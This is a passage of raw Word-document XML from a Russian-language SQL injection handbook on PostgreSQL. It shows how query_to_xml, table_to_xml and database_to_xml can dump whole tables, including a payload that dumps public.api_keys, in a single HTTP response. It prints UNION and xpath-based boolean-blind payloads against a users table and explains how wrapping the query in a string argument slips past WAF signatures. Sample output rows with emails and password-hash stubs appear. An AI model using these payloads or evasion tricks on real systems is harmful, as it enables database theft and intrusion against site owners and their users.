          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    )::text,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    0 --'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sku</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTTP-ответа атакующий получает одно текстовое значение — XML-документ с 50 строками таблицы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&lt;table xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;row&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;id&gt;1&lt;/id&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;email&gt;alice@example.com&lt;/email&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;password_hash&gt;$2b$12$abc...xyz&lt;/password_hash&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;/row&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;row&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;id&gt;2&lt;/id&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;email&gt;bob@example.com&lt;/email&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;password_hash&gt;$2b$12$def...uvw&lt;/password_hash&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;/row&gt;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&lt;/table&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Аргументы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 text</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — произвольный SQL (SELECT). Здесь идёт настоящий запрос атакующего.</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nulls boolean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NULL-значения сериализуются как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;col xsi:nil="true"/&gt;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false</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: NULL-колонки выкидываются из XML (теряются). Для разведки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лучше — атакующий видит присутствие NULL.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tableforest boolean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false</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: один корень </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;table&gt;</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&lt;row&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-детьми (как выше);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серия независимых </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;row&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> без корня (массив XML-фрагментов). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">false</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> удобнее для парсинга на стороне атакующего.</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targetns text</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — XML namespace. Пустая строка — без namespace.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Возврат функции — тип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который явно кастится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для UNION-совместимости с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sku text</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UNION упадёт с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION types text and xml cannot be matched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Варианты той же функции</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">`table_to_xml('schema.name'::regclass, true, false, '')`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — дампит указанную таблицу целиком, без LIMIT:</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table_to_xml('public.api_keys'::regclass, true, false, '')::text, 0 --</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Удобнее, когда нужна таблица «как есть» без специфичного WHERE/LIMIT, и атакующий уверен, что объём в HTTP-ответ поместится (несколько MB). Без LIMIT для большой таблицы — таймаут на стороне PG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или обрыв HTTP-ответа.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">`database_to_xml(true, false, '')`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — дампит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">всю</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> БД (все таблицы, к которым у роли есть SELECT). На реальных БД это десятки MB — payload почти всегда упирается в HTTP-лимиты,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или OOM application-сервера. Реалистичен только на маленьких dev/test-кластерах. Полезен в очень узком сценарии: target — пустая или микро-БД (например, internal admin-инструмент с одной-двумя таблицами).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">`query_to_xmlschema(...)` / `table_to_xmlschema(...)`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — возвращают XSD-схему (без данных). Полезно для быстрой разведки структуры, если по какой-то причине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(3.8.1) заблокированы WAF: XSD содержит имена и типы колонок.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Обход подбора UNION-колонок через xpath</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Альтернативный вариант, когда не получается подобрать число колонок UNION или их типы:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">x' AND 1 = (xpath('count(//row)', query_to_xml('SELECT email FROM users', true, false, '')))[1]::text::int --</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Здесь результат query_to_xml парсится через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">xpath()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (см. 3.11.3) — payload может работать как boolean-blind (3.3) или error-based (3.2), не требуя UNION-канала. Это позволяет применять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не только в SELECT-эндпоинтах, но и в любой точке инъекции, где можно вычислить выражение.</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получает то же содержимое, что и через классическую UNION (3.1), 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Без подбора числа колонок</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — одна колонка результата (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">xml::text</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) подгоняется под любую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-колонку исходного SELECT. Это критично, если WAF блокирует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">NULL,NULL,NULL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-разведку или error-сигналы от </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY 1,2,3</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Без построения per-column UNION-веток</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query_to_xml('SELECT a, b, c, d, e FROM t')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> за один запрос возвращает все колонки сразу, в отличие от 5 UNION-payload-ов для 5 колонок.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Без chunked-итерации по строкам</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LIMIT 50</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в payload-е возвращает 50 строк за один HTTP-ответ; для 3.1 это 50 итераций по 1 строке (через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 сохранением структуры данных</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — XML тегирует значения именами колонок, парсинг на стороне атакующего тривиален (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">xmllint --xpath '//row/email/text()'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">). Сырой UNION возвращает плоские строки, требующие позиционного парсинга.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 возможностью выполнения произвольного SQL внутри строкового аргумента</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query_to_xml('&lt;любой SELECT&gt;', ...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — это как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">EVAL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для SQL. Атакующий вкладывает сюда что угодно: подзапросы, JOIN-ы, CTE.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Дополнительно: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обходит ряд WAF-сигнатур, заточенных на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT password FROM users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — здесь видно только </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">query_to_xml('SELECT ...')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, а сам опасный запрос — внутри строкового аргумента, который многие WAF не парсят дальше.</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query_to_xml(text, ...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — функция в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спроектирована для интеграции с SQL/XML-стандартом (часть стандарта SQL:2003, реализована в PG с 8.3). Цель — позволить приложениям получать результаты в XML без серверного клиентского кода. EXECUTE на функцию дефолтно —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Под капотом функция вызывает планировщик и исполнитель ровно как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> напрямую: с правами </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">текущей роли</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
